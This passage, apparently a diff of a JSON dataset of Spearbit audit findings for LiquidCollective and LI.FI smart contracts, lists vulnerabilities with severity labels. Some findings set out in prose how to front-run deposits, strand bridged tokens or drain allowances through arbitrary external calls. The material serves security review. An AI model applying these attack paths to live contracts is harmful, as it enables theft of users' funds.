vested amount at the new end date). And so one might be able to release the vested tokens before 2 years after the lock period.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "OperatorsRegistry._getNextValidatorsFromActiveOperators should not consider stopped when picking a validator", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Note that: limit = the number of validators (already pushed by the operator) that have been approved by Alluvial and can be selected to be funded; funded = the number of validators funded; stopped = the number of validators exited (they were funded at some point but for some reason have exited the staking). The implementation of the function should favor operators that have the highest number of available validators to be funded. Nevertheless, the function favors operators whose stopped value is near the funded value. Consider the following example: Op at index 0 name op1 active true limit 10 funded 5 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 1) op1 and op2 have 10 validators whitelisted. 2) op1 at time1 gets 5 validators funded. 3) op1 at time2 gets those 5 validators exited; this means that op.stopped == 5. In this scenario, those 5 validators would not be used because they are \"blacklisted\". At this point op1 has 5 validators that can be funded. op2 has 10 validators that can be funded. pickNextValidators logic should favor operators that have the higher number of available keys (not funded but approved) to be funded.
If we run operatorsRegistry.pickNextValidators(5); the result is this Op at index 0 name op1 active true limit 10 funded 10 stopped 5 keys 10 Op at index 1 name op2 active true limit 10 funded 0 stopped 0 keys 10 Op1 gets all the remaining 5 validators funded, the function (from the specification of the logic) should instead have picked Op2. Check the Appendix for a test case to reproduce this issue.", + "title": "Unlock date of certain vesting schedules does not meet the requirement", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "All vesting schedules should have the unlock date (start + lockDuration) set to 16/10/2024 0:00 GMT+0 post-migration. The following vesting schedules do not meet the requirement post-migration: indices 19, 21 and 23 have unlock date 16/10/2024 9:00 GMT+0, and indices 36-60 have unlock date 16/10/2024 22:00 GMT+0.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "approve() function can be front-ran resulting in token theft", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The approve() function has a known race condition that can lead to token theft. If a user calls the approve function a second time on a spender that was already allowed, the spender can front-run the transaction and call transferFrom() to transfer the previous value and still receive the authorization to transfer the new value.", + "title": "ERC20VestableVotesUpgradeableV1._computeVestingReleasableAmount: Users with VestingSchedule.releasedAmount > globalUnlocked will be temporarily denied of service", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The current version of the code introduces a new concept: global unlocking. The idea is that wherever IgnoreGlobalUnlockSchedule is set to false, the releasable amount will be the minimum value between the original vesting schedule releasable amount and the global unlocking releasable amount (the constant rate of VestingSchedule.amount / 24 for each month starting at the end of the locking period). The implementation, however, contains an accounting error caused by a wrong implicit assumption that, during the execution of _computeVestingReleasableAmount, globalUnlocked cannot be less than releasedAmount. In reality, however, this state is possible for users that have already claimed vested tokens. In that case globalUnlocked - releasedAmount will revert with an underflow, causing a delay in the vesting schedule which in the worst case may last for two years. Originally this issue was meant to be classified as medium risk but since the team stated that with the current deployment, no tokens will be released whatsoever until the upcoming upgrade of the TLC contract, we decided to classify this issue as low risk instead.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "Add missing input validation on constructor/initializer/setters", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Allowlist.1.sol initAllowlistV1 should require the _admin parameter to be not equal to address(0).
This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. allow should check _accounts[i] to be not equal to address(0). Firewall.sol constructor should check that: governor_ != address(0). executor_ != address(0). destination_ != address(0). setGovernor should check that newGovernor != address(0). setExecutor should check that newExecutor != address(0). OperatorsRegistry.1.sol initOperatorsRegistryV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. addOperator should check: _name to not be an empty string. _operator to not be address(0). _feeRecipi- ent to not be address(0). setOperatorAddress should check that _newOperatorAddress is not address(0). setOperatorFeeRecipientAddress should check that _newOperatorFeeRecipientAddress is not address(0). setOperatorName should check that _newName is not an empty string. Oracle.1.sol initOracleV1 should require the _admin parameter to be not equal to address(0). This check is not needed if issue LibOwnable._setAdmin allows setting address(0) as the admin of the contract is implemented directly at LibOwnable._setAdmin level. Consider also adding some min and max limit to the values of _annualAprUpperBound and _relativeLowerBound and be sure that _epochsPerFrame, _slotsPerEpoch, _secondsPerSlot and _genesisTime matches the values expected. addMember should check that _newOracleMember is not address(0). setBeaconBounds: Consider adding min/max value that _annualAprUpperBound and _relativeLowerBound should respect. River.1.sol initRiverV1: _globalFee should follow the same validation done in setGlobalFee. Note that client said that 0 is a valid _- globalFee value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" _operatorRewardsShare should follow the same validation done in setOperatorRewardsShare. Note that client said that 0 is a valid _operatorRewardsShare value \"The revenue redistributuon would be computed off-chain and paid by the treasury in that case. It's still an on-going discussion they're having at Alluvial.\" ConsensusLayerDepositManager.1.sol initConsensusLayerDepositManagerV1: _withdrawalCredentials should not be empty and follow the re- quirements expressed in the following official Consensus Specs document. 26", + "title": "TlcMigration.migrate: Missing input validation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "The upcoming change in some of the vesting schedules is going to be executed via the migrate function which at the current version of the code is missing necessary validation checks to make sure no erroneous values are inserted.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Low Risk" ] }, { - "title": "LibOwnable._setAdmin allows setting address(0) as the admin of the contract", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "While other contracts like RiverAddress (for example) do not allow address(0) to be used as set input parameter, there is no similar check inside LibOwnable._setAdmin. 
Because of this, contracts that call LibOwnable._setAdmin with address(0) will not revert and functions that should be callable by an admin cannot be called anymore. This is the list of contracts that import and use the LibOwnable library AllowlistV1 OperatorsRegistryV1 OracleV1 RiverV1", + "title": "Optimise the release amount calculation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "In the presence of a global lock schedule one calculates the release amount as: LibUint256.min(vestedAmount - releasedAmount, globalUnlocked - releasedAmount)", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Gas Optimization" ] }, { - "title": "OracleV1.getMemberReportStatus returns true for non existing oracles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "memberIndex will be equal to -1 for non-existing oracles, which will cause the mask to be equal to 0, which will cause the function to return true for non-existing oracles.", + "title": "Use msg.sender whenever possible", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "In this context the parameters vestingSchedule.{creator, beneficiary} have already been checked to be equal to msg.sender: if (msg.sender != vestingSchedule.X) { revert LibErrors.Unauthorized(msg.sender); }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Gas Optimization" ] }, { - "title": "Operators might add the same validator more than once", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Operators can use OperatorsRegistryV1.addValidators to add the same validator more than once. Depositors' funds will be directed to these duplicated addresses, which in turn, will end up having more than 32 eth. This act will damage the capital efficiency of the entire deposit pool and thus will potentially impact the pool's APY.", + "title": "Test function testMigrate uses outdated values for assertion", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "In commit fbcc4ddd6da325d60eda113c2b0e910aa8492b88, the newLockDuration values were updated in TLC_globalUnlockScheduleMigration.sol. However, the testMigrate function was not updated accordingly and still compares schedule.lockDuration to the outdated newLockDuration values, resulting in failing assertions.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "OracleManager.setBeaconData possible front running attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The system is designed in a way that depositors receive shares (lsETH) in return for their eth de- posit. A share represents a fraction of the total eth balance of the system in a given time. Investors can claim their staking profits by withdrawing once withdrawals are active in the system. Profits are being pulled from ELFeeRe- cipient to the River contract when the oracle is calling OracleManager.setBeaconData.
setBeaconData updates BeaconValidatorBalanceSum which might be increased or decreased (as a result of slashing for instance). Investors have the ability to time their position in two main ways: Investors might time their deposit just before profits are being distributed, thus harvesting profits made by others. Investors might time their withdrawal / sell lsETH on secondary markets just before the loss is realized. By doing this, they will effectively avoid the loss, escaping the intended mechanism of socializing losses.", + "title": "Rounding Error in Unlocked Token Amount Calculation at ERC20VestableVotesUpgradeable.1.sol#L458", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "There is a rounding error in calculating the unlocked amount, which may lead to minor discrepancies in the tokens available for release.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "SharesManager._mintShares - Depositors may receive zero shares due to front-running", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The number of shares minted to a depositor is determined by (_underlyingAssetValue * _total- Supply()) / oldTotalAssetBalance. Potential attackers can spot a call to UserDepositManagerV1._deposit and front-run it with a transaction that sends wei to the contract (by self-destructing another contract and sending the funds to it), causing the victim to receive fewer shares than what he expected. More specifically, In case old- TotalAssetBalance() is greater than _underlyingAssetValue * _totalSupply(), then the number of shares the depositor receives will be 0, although _underlyingAssetValue will be still pulled from the depositors balance. An attacker with access to enough liquidity and to the mem-pool data can spot a call to UserDepositManagerV1._- deposit and front-run it by sending at least totalSupplyBefore * (_underlyingAssetValue - 1) + 1 wei to the contract . This way, the victim will get 0 shares, but _underlyingAssetValue will still be pulled from its account balance. In this case, the attacker does not necessarily have to be a whitelisted user, and it is important to mention that the funds that were sent by him can not be directly claimed back, rather, they will increase the price of the share. The attack vector mentioned above is the general front runner case, the most profitable attack vector will be the case where the attacker is able to determine the share price (for instance if the attacker mints the first share). In this scenario, the attacker will need to send at least attackerShares * (_underlyingAssetValue - 1) + 1 to the contract, (attackerShares is completely controlled by the attacker, and thus can be 1). In our case, depositors are whitelisted, which makes this attack harder for a foreign attacker.", + "title": "It might take longer than 2 years to release all the vested schedule amount after the lock period ends", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "It is possible that in the presence of the global lock, releasing the total vested value might take longer than 2 years if the lockDuration + 2 years is comparatively small when compared to duration (or end - start).
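As an illustration with hypothetical values: take lockDuration = 1 year and duration = 10 years. Two years after the lock ends, the global unlock schedule already permits releasing 24/24 = 100% of the scheduled amount, but only 3 years / 10 years = 30% of it has actually vested, so the remainder only becomes releasable gradually as it vests, up to the 10-year mark.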
We just know that after 2 years all the scheduled amount can be released but only a portion of it might have been vested.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Medium Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "Orphaned (index, values) in SlotOperator storage slots in operatorsRegistry", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "If !opExists corresponds to an operator which has OperatorResolution.active set to false, the line below can leave some orphaned (index, values) in SlotOperator storage slots: _setOperatorIndex(name, newValue.active, r.value.length - 1);", + "title": "_computeVestingReleasableAmount's_time input parameter can be removed/inlined", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollectivePR-Spearbit-Security-Review-Sept.pdf", + "body": "At both call sites to _computeVestingReleasableAmount(...), time is _getCurrentTime().", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low Risk" + "LiquidCollectivePR", + "Severity: Informational" ] }, { - "title": "OperatorsRegistry.setOperatorName Possible front running attacks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "1. setOperatorName reverts for an already used name, which means that a call to setOperatorName might be front-ran using the same name. The front-runner can launch the same attack again and again thus causing a DoS for the original caller. 2. setOperatorName can be called either by an operator (to edit his own name) or by the admin. setOpera- torName will revert for an already used _newName. setOperatorName caller might be front-ran by the identical transaction transmitted by someone else, which will lead to failure for his transaction, where in practice this failure is a \"false failure\" since the desired change was already made.", + "title": "Hardcode bridge addresses via immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Most bridge facets call bridge contracts where the bridge address has been supplied as a parameter. This is inherently unsafe because any address could be called. Luckily, the called function signature is hardcoded, which reduces risk. However, it is still possible to call an unexpected function due to the potential collisions of function signatures. Users might be tricked into signing a transaction for the LiFi protocol that calls unexpected contracts. One exception is the AxelarFacet which sets the bridge addresses in initAxelar(), however this is relatively expensive as it requires an SLOAD to retrieve the bridge addresses. Note: also see \"Facets approve arbitrary addresses for ERC20 tokens\". function startBridgeTokensViaOmniBridge(..., BridgeData calldata _bridgeData) ... { ... _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { IOmniBridge bridge = IOmniBridge(_bridgeData.bridge); if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.wrapAndRelayTokens{ ... }(...); } else { ... bridge.relayTokens(...); } ... } contract AxelarFacet { function initAxelar(address _gateway, address _gasReceiver) external { ... s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } function executeCallViaAxelar(...) ... { ... 
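// note: s.gateway and s.gasReceiver are read from storage on every call (one SLOAD each);
// immutable addresses would avoid this cost and pin the contracts being called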
s.gasReceiver.payNativeGasForContractCall{ ... }(...); s.gateway.callContract(destinationChain, destinationAddress, payload); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Prevent users from burning token via lsETH/wlsETH transfer or transferFrom functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "The current implementation of both lsETH (SharesManager component of River contract) and wlsETH allow the user to \"burn\" tokens, sending them directly to the address(0) via the transfer and transferFrom function. By doing that, it would bypass the logic of the existing burn functions present right now (or in the future when withdrawals will be enabled in River) in the protocol.", + "title": "Tokens are left in the protocol when the swap at the destination chain fails", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LiFi protocol finds the best bridge route for users. In some cases, it helps users do a swap at the destination chain. With the help of the bridge protocols, LiFi protocol helps users trigger swapAndCompleteBridgeTokensVia{Services} or CompleteBridgeTokensVia{Services} at the destination chain to do the swap. Some bridge services will send the tokens directly to the receiver address when the execution fails. For example, Stargate, Amarok and NXTP do the external call in a try-catch clause and send the tokens directly to the receiver when it fails. If the receiver is the Executor contract, the tokens will stay in the LiFi protocol in this scenario, and users can freely pull the tokens. Note: Exploiters can pull the tokens from the LiFi protocol. Please refer to the issue Remaining tokens can be sweeped from the LiFi Diamond or the Executor, Issue #82. Exploiters can take a more aggressive strategy and force the victim's swap to revert. A possible exploit scenario: A victim wants to swap 10K of Optimism's BTC into Ethereum mainnet USDC. Since DEXes on mainnet have the best liquidity, LiFi protocol helps users do the swap on mainnet. The transaction on the source chain (Optimism) succeeds and the bridge services try to call CompleteBridgeTokensVia{Services} on mainnet. The exploiter builds a sandwich attack to pump the BTC price. The CompleteBridgeTokens call fails since the price is bad. The bridge service does not revert the whole transaction. Instead, it sends the BTC on mainnet to the receiver (LiFi protocol). The exploiter pulls tokens from the LiFi protocol.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Low Risk" + "LIFI", + "Severity: High Risk" ] }, { - "title": "In addOperator when emitting an event use stack variables instead of reading from memory again", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In OperatorsRegistry's addOperator function when emitting the AddedOperator event we read from memory all the event parameters except operatorIndex.
emit AddedOperator(operatorIndex, newOperator.name, newOperator.operator, newOperator.feeRecipient); We can avoid reading from memory to save gas.", + "title": "Tokens transferred with Axelar can get lost if the destination transaction cant be executed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "If _executeWithToken() reverts then the transaction can be retried, possibly with additional gas. See axelar recovery. However there is no option to return the tokens or send them elsewhere. This means that tokens would be lost if the call cannot be made to work. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... (bool success, ) = callTo.call(callData); if (!success) revert ExecutionFailed(); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite pad64 so that it doesn't use BytesLib.concat and BytesLib.slice to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "We can avoid using the BytesLib.concat and BytesLib.slice and write pad64 mostly in assembly. Since the current implementation adds more memory expansion than needed (also not highly optimized).", + "title": "Use the getStorage() / NAMESPACE pattern instead of global variables", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The facet DexManagerFacet and the inherited contracts Swapper.sol / SwapperV2.sol define a global variable appStorage on the first storage slot. These two overlap, which in this case is intentional. However it is dangerous to use this construction in a Diamond contract as this uses delegatecall. If any other contract uses a global variable it will overlap with appStorage with unpredictable results. This is especially impor- tant because it involves access control. For example if the contract IAxelarExecutable.sol were to be inherited in a facet, then its global variable gateway would overlap. Luckily this is currently not the case. contract DexManagerFacet { ... LibStorage internal appStorage; ... } contract Swapper is ILiFi { ... LibStorage internal appStorage; // overlaps with DexManagerFacet which is intentional ... }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Cache r.value.length used in a loop condition to avoid reading from the storage multiple times.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In a loop like the one below, consider caching r.value.length value to avoid reading from storage on every round of the loop. for (uint256 idx = 0; idx < r.value.length;) {", + "title": "Decrease allowance when it is already set a non-zero value", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Non-standard tokens like USDT will revert the transaction when a contract or a user tries to approve an allowance when the spender allowance is already set to a non zero value. For that reason, the previous allowance should be decreased before increasing allowance in the related function. 
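A minimal sketch of the recommended reset-to-zero pattern (using OpenZeppelin's SafeERC20; token, spender and amount are placeholder names): using SafeERC20 for IERC20; ... // reset to zero first so tokens like USDT do not revert on a non-zero -> non-zero change token.safeApprove(spender, 0); token.safeApprove(spender, amount); Alternatively, safeIncreaseAllowance / safeDecreaseAllowance adjust the allowance relative to its current value and avoid the non-zero overwrite entirely.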
Performing a direct overwrite of the value in the allowances mapping is susceptible to front-running scenarios by an attacker (e.g., an approved spender). As OpenZeppelin mentions, safeApprove should only be called when setting an initial allowance or when resetting it to zero. function safeApprove( IERC20 token, address spender, uint256 value ) internal { // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, spender, value)); } There are four instances of this issue: AxelarFacet.sol directly uses the approve function, which does not check the return value of the external call. The facet should utilize the LibAsset.maxApproveERC20() function like the other facets. LibAsset's maxApproveERC20() function is used in the other facets. For instance, USDT's approval mechanism reverts if the current allowance is nonzero. For that reason, the function can approve with zero first, or safeIncreaseAllowance can be utilized. FusePoolZap.sol also uses the approve function without checking the return value. The contract does not import any other libraries; that being the case, it should use the safeApprove function, approving zero first. Executor.sol directly uses the approve function without checking the return value of the external call. The contract should utilize the LibAsset.maxApproveERC20() function like the other contracts.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite the for loop in ValidatorKeys.sol::getKeys to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "", + "title": "Too generic calls in GenericBridgeFacet allow stealing of tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "With the contract GenericBridgeFacet, the functions swapAndStartBridgeTokensGeneric() (via LibSwap.swap()) and _startBridge() allow arbitrary function calls, which allow anyone to call transferFrom() and steal tokens from anyone who has given a large allowance to the LiFi protocol. This has been used to hack LiFi in the past. The following risks are also present: call the LiFi Diamond itself via functions that don't have nonReentrant. perhaps cancel transfers of other users. call functions that are protected by a check on this, like completeBridgeTokensViaStargate. contract GenericBridgeFacet is ILiFi, ReentrancyGuard { function swapAndStartBridgeTokensGeneric( ... LibSwap.swap(_lifiData.transactionId, _swapData[i]); ... } function _startBridge(BridgeData memory _bridgeData) internal { ... (bool success, bytes memory res) = _bridgeData.callTo.call{ value: value }(_bridgeData.callData); ... } } library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData); ...
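// note: _swapData.callTo and _swapData.callData are fully caller-controlled at this point, so this
// low-level call can target any contract and function, e.g. token.transferFrom(victim, attacker, amount)
// for any token a victim has approved to the LiFi Diamond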
} }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Operators.get in _getNextValidatorsFromActiveOperators can be replaced by Opera- tors.getByIndex to avoid extra operations/gas.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Operators.get in _getNextValidatorsFromActiveOperators performs multiple checks that have been done before when Operators.getAllFundable() was called. This includes finding the index, and checking if OperatorResolution.active is set. These are all not necessary.", + "title": "LiFi protocol isnt hardened", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "The usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs and doesnt verify them. Several elements are not connected via smart contracts but via the API, for example: the emits of LiFiTransferStarted versus the bridge transactions. the fees paid to the FeeCollector versus the bridge transactions. the Periphery contracts as defined in the PeripheryRegistryFacet versus the rest. In case the API and or frontend contain errors or are hacked then tokens could be easily lost. Also, when calling the LiFi contracts directly or via other smart contracts, it is rather trivial to commit mistakes and loose tokens. Emit data can be easily disturbed by malicious actors, making it unusable. The payment of fees can be easily circumvented by accessing the contracts directly. It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in loosing tokens. With the current design, the power of smart contracts isnt used and it introduces numerous risks as described in the rest of this report.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Avoid unnecessary equality checks with true in if statements", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "Statements of the type if( condition == true) can be replaced with if(condition). The extra comparison with true is redundant.", + "title": "Bridge with Axelar can be stolen with malicious external call", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "Executor contract allows users to build an arbitrary payload external call to any address except address(erc20Proxy). erc20Proxy is not the only dangerous address to call. By building a malicious external call to Axelar gateway, exploiters can steal users funds. The Executor does swaps at the destination chain. By setting the receiver address to the Executor contract at the destination chain, Li-Fi can help users to get the best price. Executor inherits IAxelarExecutable. execute and executeWithToken validates the payload and executes the external call. IAxelarExecutable.sol#L27-L40 function executeWithToken( bytes32 commandId, string calldata sourceChain, string calldata sourceAddress, bytes calldata payload, string calldata tokenSymbol, uint256 amount ) external { bytes32 payloadHash = keccak256(payload); if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, ,! 
tokenSymbol, amount)) revert NotApprovedByGateway(); _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount); } The nuance lies in the Axelar gateway AxelarGateway.sol#L133-L148. Once the receiver calls validateContractCallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks it as executed. It is the receiver contract's responsibility to execute the external call. Exploiters can build a malicious external call to trigger validateContractCallAndMint; the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. The possible exploit scenario: 1. The exploiter builds a malicious external call: token.approve(address(exploiter), type(uint256).max). 2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the user sets the receiver to address(Executor) and finishes the swap with this.swapAndCompleteBridgeTokens. 3. The exploiter observes the victim's bridge tx and builds an external call to trigger gateway.validateContractCallAndMint. The Executor contract gets the minted tokens, and the exploiter can pull them from the Executor contract since there's max allowance. 4. The victim calls Executor.execute() with the valid payload. However, since the payload has already been triggered by the exploiter, it's no longer valid.", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: High Risk" ] }, { - "title": "Rewrite OperatorRegistry.getOperatorDetails to save gas", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective-Spearbit-Security-Review.pdf", - "body": "In getOperatorDetails the 1st line is: _index = Operators.indexOf(_name); Since we already have the _index from this line we can use that along with getByIndex to retrieve the _opera- torAddress. This would reduce the gas cost significantly, since Operators.get(_name) calls Operators._getOp- eratorIndex(name) to find the _index again. testExecutorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testGovernorCanSetOperatorLimit() (gas: -1086 (-0.001%)) testUserDepositsForAnotherUser() (gas: -2172 (-0.001%)) testDeniedUser() (gas: -2172 (-0.001%)) testELFeeRecipientPullFunds() (gas: -2172 (-0.001%)) testUserDepositsUnconventionalDeposits() (gas: -2172 (-0.001%)) testUserDeposits() (gas: -2172 (-0.001%)) testNoELFeeRecipient() (gas: -2172 (-0.001%)) testUserDepositsTenPercentFee() (gas: -2172 (-0.001%)) testUserDepositsFullAllowance() (gas: -2172 (-0.001%)) testValidatorsPenaltiesEqualToExecLayerFees() (gas: -2172 (-0.001%)) testValidatorsPenalties() (gas: -2172 (-0.001%)) testUserDepositsOperatorWithStoppedValiadtors() (gas: -3258 (-0.002%)) testMakingFunctionGovernorOnly() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorLimit() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStatus() (gas: -1086 (-0.005%)) testRandomCallerCannotSetOperatorStoppedValidatorCount() (gas: -1086 (-0.005%)) testExecutorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStatus() (gas: -1086 (-0.006%)) testGovernorCanSetOperatorStoppedValidatorCount() (gas: -1086 (-0.006%)) testGovernorCanAddOperator() (gas: -1086 (-0.006%)) testExecutorCanSetOperatorStatus() (gas: -1086 (-0.006%)) Overall gas change: -36924 (-0.062%) Also note, when the operator is not OperatorResolution.active, _index becomes -1 in both cases.
With the change suggested if _index is -1, uint256(_index) == type(uint256).max which would cause getByIndex to revert with OperatorNotFoundAtIndex(index). But with the current code, it will revert with an index out-of-bound type of error. _operatorAddress = Operators.getByIndex(uint256(_index)).operator;", + "title": "LibSwap may pull tokens that are different from the specified asset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", + "body": "LibSwap.swap is responsible for doing swaps. It's designed to swap one asset at a time. The _swapData.callData is provided by the user and the LiFi protocol only checks its signature. As a result, users can build calldata that swaps a different asset than specified. For example, users can set fromAssetId = dai and provide addLiquidity(usdc, dai, ...) as call data. The Uniswap router would pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users could sweep tokens from the protocol. library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue }(_swapData.callData); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } }", "labels": [ "Spearbit", - "LiquidCollective", - "Severity: Gas Optimization" + "LIFI", + "Severity: Medium Risk" ] }, { - "title": "Rewrite/simplify OracleV1.isMember to save gas.", - "html_url": 